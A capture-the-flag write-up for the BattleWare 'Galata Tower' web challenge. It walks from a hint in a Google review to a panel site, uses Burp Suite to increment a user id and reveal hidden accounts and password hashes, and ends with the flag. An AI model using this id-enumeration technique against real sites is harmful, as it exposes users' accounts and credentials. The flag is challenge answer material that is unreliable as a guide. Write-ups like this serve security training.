BattleWare CTF “Galata Tower” Write-up
Hi,
Firstly, I would like to share with you the solution of the problem in the WEB category by leaving the third week of the Battleware CTF Competition, which is a short-term but fun and at the same time a challenging.
WEB
“Galata Tower, one of the most important historical places in Istanbul and the world, is defınitely should visit and witness its history. Before you go, you definitely should look at the intensity on Google maps, and at the same time, I recommend you to set a walking route for yourself as there is no car park around. This is the most important advice Ican give you on your trip and I rated 5 starts this place.”
In the question, It gives information about Galata Tower and finally gave us “I rated 5 starts this place” says. This information shows that there may be a hint waiting for us among those who gave 5 points in the comments section when we search the Galata Tower on Google.
A user named BattleWare Zone commented, “Happy to see you here. your next step is “0r1on.battleware.zone”. We can see that it is directing us to a link for the next step. When we click on the link, we can see that there is a panel screen and when we search for “Battleware” in the search button, we can see usernames and encrypted passwords. Since the panel is closed, I can only illustrate it with one photo.
As seen in the photo, there are users and encrypted passwords on the panel. We can examine the panel with Burp Suite to see all users.
For this, we set the browser’s network settings to work on localhost and make Burp Suite available on the site by making “Intercept is on” from the Proxy settings via Burp Suite.
Later, by renewing the site, we can view the part of the site with users and encrypted passwords on Burp Suite. We can see that there are 5 different users and encrypted passwords on the site. When we examine it with BurpSuite, we can see the other users hidden in the database and their encrypted passwords by increasing the id, part under the user and password section. Thus, we can reach other hidden users. When we bring id to the 12th user, on the panel, “I wonder if I am the one you are looking for? (Acaba aradığın ben miyim?)” It gives us the “1morestep.php” output as part with the username. To examine how this part is done on BurpSuite, you can access a short video for this part from the link below.
https://mega.nz/file/ZqwmGDYR#p6YBwIZ-mkoftpC7r23ZwCrhVXPIb4XkUgNmU7wwRiE
We examine the obtained 1morestep.php by adding it to the URL of the panel. “0r1on.battleware.zone/1morestep.php”, we come across a photo of Galata Tower.
At this stage, when we examine the site with the help of F12 to where the photo is located, we can see that they have stored a flag for us in the source code.
Flag: Flag{H4pPy_Y0ur_H3rE_03}
Thank you for your time 😊
